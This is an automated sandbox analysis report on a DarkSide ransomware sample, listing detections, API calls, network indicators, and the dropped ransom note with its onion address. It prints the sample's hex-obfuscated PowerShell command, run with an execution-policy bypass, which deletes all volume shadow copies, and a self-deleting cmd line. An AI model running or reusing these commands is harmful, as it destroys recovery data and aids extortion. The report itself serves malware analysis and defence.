Analysis Report rUUR0qQI22

Overview

General Information

Sample Name: rUUR0qQI22 (renamed file extension from none to exe)
Analysis ID: 401962
MD5: 9d418ecc0f3bf45029263b0944236884
SHA1: eeb28144f39b275ee1ec008859e80f215710dc57
SHA256: 151fbd6c299e734f7853497bd083abfa29f8c186a9db31dbe330ace2d35660d5
Tags: DarkSideRansomware
Infos:

Most interesting Screenshot:

Detection

DarkSide
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected DarkSide Ransomware
Bypasses PowerShell execution policy
Contains functionalty to change the wallpaper
Deletes itself after installation
Found Tor onion address
Machine Learning detection for sample
Obfuscated command line found
Tries to harvest and steal browser information (history, passwords, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to enumerate running services
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: rUUR0qQI22.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: rUUR0qQI22.exe ReversingLabs: Detection: 93%
Machine Learning detection for sample
Source: rUUR0qQI22.exe Joe Sandbox ML: detected

Compliance:

barindex
Uses 32bit PE files
Source: rUUR0qQI22.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File created: C:\\README.418990b0.TXT Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File created: C:\Recovery\README.418990b0.TXT Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File created: C:\Users\README.418990b0.TXT Jump to behavior
Source: rUUR0qQI22.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE5490 RtlAllocateHeap,RtlAllocateHeap,wcscpy,wcslen,FindFirstFileExW,wcscpy,wcsrchr,wcslen,wcscpy,GetFileAttributesW,PathIsDirectoryEmptyW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RtlFreeHeap,RtlFreeHeap, 0_2_00CE5490
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE67AD RtlAllocateHeap,RtlAllocateHeap,wcscpy,GetFileAttributesW,PathAddBackslashW,wcslen,FindFirstFileExW,wcscpy,wcslen,wcscpy,_wcsicmp,wcsstr,wcsstr,GetFileAttributesW,wcsrchr,FindNextFileW,FindClose,wcsrchr,wcsrchr,PathIsDirectoryEmptyW,RemoveDirectoryW,RtlFreeHeap,RtlFreeHeap, 0_2_00CE67AD
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE525B wcscpy,wcslen,FindFirstFileExW,wcscpy,wcsrchr,wcscpy,FindNextFileW,FindClose, 0_2_00CE525B
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE5368 wcscpy,wcslen,FindFirstFileExW,wcscpy,wcslen,wcscpy,FindNextFileW,FindClose, 0_2_00CE5368
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE51E6 GetLogicalDriveStringsW,GetDriveTypeW,wcscpy, 0_2_00CE51E6
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome Jump to behavior

Networking:

barindex
Found Tor onion address
Source: README.418990b0.TXT.0.dr String found in binary or memory: 2) Open our website: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.105.109.19 185.105.109.19
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.3:49717 -> 185.105.109.19:443
Source: unknown DNS traffic detected: queries for: securebestapp20.com
Source: powershell.exe, 00000006.00000002.287565271.00000165FE112000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: README.418990b0.TXT.0.dr String found in binary or memory: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT
Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.279994844.0000016580001000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.280232531.0000016580211000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.282581454.000001658117D000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.284710832.00000165901A3000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: rUUR0qQI22.exe, 00000000.00000002.431464752.0000000003855000.00000004.00000001.sdmp, rUUR0qQI22.exe, 00000000.00000002.431628037.00000000038C0000.00000004.00000001.sdmp String found in binary or memory: https://securebestapp20.com/jVPuJOnhRSBl
Source: rUUR0qQI22.exe, 00000000.00000002.431628037.00000000038C0000.00000004.00000001.sdmp String found in binary or memory: https://securebestapp20.com/jVPuJOnhRSBlO
Source: README.418990b0.TXT.0.dr String found in binary or memory: https://torproject.org/
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443

Spam, unwanted Advertisements and Ransom Demands:

barindex
Found ransom note / readme
Source: C:\README.418990b0.TXT Dropped file: ----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT When you open our website, put the following data in the input form: Key: 0kZdK3HQhsAkUtvRl41QkOdpJvzcWnCrBjjgg5U4zfuWeTnZR5Ssjd3QLHpmbjxjo7uWzKbt8qPVuYN38TsDPI3bemd5I40ksemIzuI5OhIHZsi9cn3Wpd7OUT72FP9MyAUzR586yMsI2Ygri9in0Bf4EkG0pmBOLyRG1T788foGJQW1WxS1Qd2sMVvX0jKlbGG1zLp7g0u6buDCzSMyTjWjuVzJYufBBv7S2XvciEVvboiTNbZA4UUU6PttKERQSb018aILd6xO3ulk6fbEgZDO5tZSGn2zRevn5YXnHtg6vt1ToLe3izQOgYbs8Ja1fkfJBUYVux1ITyWBjpn0xPayKfwln8SqgMkbqiDyxEDEtFhqiffLcONMhi4TmW50loZIC6mWSaOjThWp6XSJUWPtY8Mkzs8Cs0qjPahx58iAEVIRGUVpLkMs7xPN7ydZ6wMWaOcRC1AD1JEUVTjLikXXyckgYaS6FnEv0UNEsv6QbTLSpDomIg3rEYZBib6ozrwH5n0M5wrKo8NciUBmfJWDP4XKkjznpsa05rEpuAklM0dMmZsYGVR !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!! Jump to dropped file
Yara detected DarkSide Ransomware
Source: Yara match File source: 00000000.00000003.293094493.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.292893139.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.256370495.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.209248518.00000000007E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.292412422.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.290688765.00000000007DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.210042199.00000000007E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.209243107.00000000007C6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.428838029.00000000007AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: C:\README.418990b0.TXT, type: DROPPED
Source: Yara match File source: C:\README.418990b0.TXT, type: DROPPED
Source: Yara match File source: C:\README.418990b0.TXT, type: DROPPED
Contains functionalty to change the wallpaper
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE4255 CreateFontW,RtlFreeHeap,SelectObject,RtlAllocateHeap,_swprintf,GetTextExtentPoint32W,SelectObject,SetTextColor,SetBkMode,SetBkColor,DrawTextW,SelectObject,SHGetSpecialFolderPathW,PathAddBackslashW,wcscat,wcslen,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,RegOpenKeyExW,wcslen,RegSetValueExW,wcslen,RegSetValueExW,SystemParametersInfoW,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RegCloseKey,CloseHandle,DeleteObject,DeleteObject,RtlFreeHeap,DeleteObject,DeleteDC,DeleteDC, 0_2_00CE4255

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: rUUR0qQI22.exe, type: SAMPLE Matched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
Source: 0.2.rUUR0qQI22.exe.ce0000.1.unpack, type: UNPACKEDPE Matched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
Source: 0.0.rUUR0qQI22.exe.ce0000.0.unpack, type: UNPACKEDPE Matched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
Contains functionality to call native functions
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE4DDA RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,_wcslwr,wcsstr,OpenProcess,TerminateProcess,CloseHandle,wcslen,RtlFreeHeap, 0_2_00CE4DDA
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE7E5D NtSetInformationThread,IsUserAnAdmin,GetCommandLineW,CommandLineToArgvW,_wcsicmp,wcsrchr,_wcsicmp,wcsrchr,_wcsicmp,OpenMutexW,CreateMutexW,CloseHandle,CloseHandle,CloseHandle, 0_2_00CE7E5D
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE4C32 NtSetInformationProcess,NtSetInformationProcess, 0_2_00CE4C32
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE57E5 wcsrchr,GetCurrentProcessId,RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,RtlAllocateHeap,OpenProcess,DuplicateHandle,wcsrchr,_wcsicmp,RtlAllocateHeap,NtQueryInformationProcess,wcsrchr,_wcsicmp,wcslen,CloseHandle,TerminateProcess,WaitForSingleObject,CloseHandle,RtlFreeHeap,CloseHandle,CloseHandle,RtlFreeHeap,RtlFreeHeap, 0_2_00CE57E5
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE56F9 CreateFileW,RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,GetCurrentProcessId,RtlFreeHeap,CloseHandle, 0_2_00CE56F9
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE5787 NtQuerySystemInformation,GetCurrentProcessId,RtlFreeHeap,CloseHandle, 0_2_00CE5787
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE285C NtQueryInformationProcess, 0_2_00CE285C
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE585D NtQuerySystemInformation,RtlAllocateHeap,OpenProcess,RtlFreeHeap,RtlFreeHeap, 0_2_00CE585D
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE5650 NtQueryInformationFile, 0_2_00CE5650
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE5765 NtQuerySystemInformation,GetCurrentProcessId,RtlFreeHeap,CloseHandle, 0_2_00CE5765
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE587F NtQuerySystemInformation,RtlAllocateHeap,OpenProcess,RtlFreeHeap,RtlFreeHeap, 0_2_00CE587F
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE380C GetWindowsDirectoryW,wcscat,wcscat,NtAllocateVirtualMemory,wcscpy,RtlEnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,RtlLeaveCriticalSection,LdrEnumerateLoadedModules, 0_2_00CE380C
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE4E18 NtQuerySystemInformation,_wcslwr,wcsstr,OpenProcess,TerminateProcess,CloseHandle,RtlFreeHeap, 0_2_00CE4E18
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE4E3A NtQuerySystemInformation,_wcslwr,wcsstr,OpenProcess,TerminateProcess,CloseHandle,RtlFreeHeap, 0_2_00CE4E3A
Contains functionality to delete services
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE4C7B OpenSCManagerW,EnumServicesStatusExW,RtlAllocateHeap,EnumServicesStatusExW,_wcslwr,wcsstr,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,wcslen,CloseServiceHandle,RtlFreeHeap, 0_2_00CE4C7B
Detected potential crypto function
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE209C 0_2_00CE209C
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE4819 0_2_00CE4819
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFAEE888169 6_2_00007FFAEE888169
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFAEE888F19 6_2_00007FFAEE888F19
Sample file is different than original file name gathered from version info
Source: rUUR0qQI22.exe, 00000000.00000002.429547362.0000000000B40000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs rUUR0qQI22.exe
Source: rUUR0qQI22.exe, 00000000.00000002.429694465.0000000000BA0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs rUUR0qQI22.exe
Source: rUUR0qQI22.exe, 00000000.00000002.429694465.0000000000BA0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs rUUR0qQI22.exe
Source: rUUR0qQI22.exe, 00000000.00000002.429940296.0000000000DA0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs rUUR0qQI22.exe
Uses 32bit PE files
Source: rUUR0qQI22.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: rUUR0qQI22.exe, type: SAMPLE Matched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rUUR0qQI22.exe.ce0000.1.unpack, type: UNPACKEDPE Matched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.rUUR0qQI22.exe.ce0000.0.unpack, type: UNPACKEDPE Matched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: classification engine Classification label: mal100.rans.spyw.evad.winEXE@6/10@1/2
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE4B67 OpenProcessToken,GetTokenInformation,RtlAllocateHeap,GetTokenInformation,AdjustTokenPrivileges,RtlFreeHeap,CloseHandle, 0_2_00CE4B67
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE2C69 GetLogicalDriveStringsW,GetDriveTypeW,GetDiskFreeSpaceExW,_alldiv,_alldiv,_swprintf,wcsrchr,wcslen, 0_2_00CE2C69
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File created: C:\Users\user\AppData\Local\418990b0.ico Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_01
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\0ab00e5f701610d7524fc82247c75e80
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8776:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u4ayydvj.e53.ps1 Jump to behavior
Source: rUUR0qQI22.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: rUUR0qQI22.exe ReversingLabs: Detection: 93%
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File read: C:\Users\user\Desktop\rUUR0qQI22.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\rUUR0qQI22.exe 'C:\Users\user\Desktop\rUUR0qQI22.exe'
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C DEL /F /Q C:\Users\user\Desktop\RUUR0Q~1.EXE >> NUL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: rUUR0qQI22.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: rUUR0qQI22.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation:

barindex
Obfuscated command line found
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s' Jump to behavior
PE file contains an invalid checksum
Source: rUUR0qQI22.exe Static PE information: real checksum: 0xfa78 should be: 0x16ef0
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFAEE881FA7 push esp; retf 6_2_00007FFAEE881FA8
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File created: C:\\README.418990b0.TXT Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File created: C:\Recovery\README.418990b0.TXT Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File created: C:\Users\README.418990b0.TXT Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Deletes itself after installation
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C DEL /F /Q C:\Users\user\Desktop\RUUR0Q~1.EXE >> NUL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
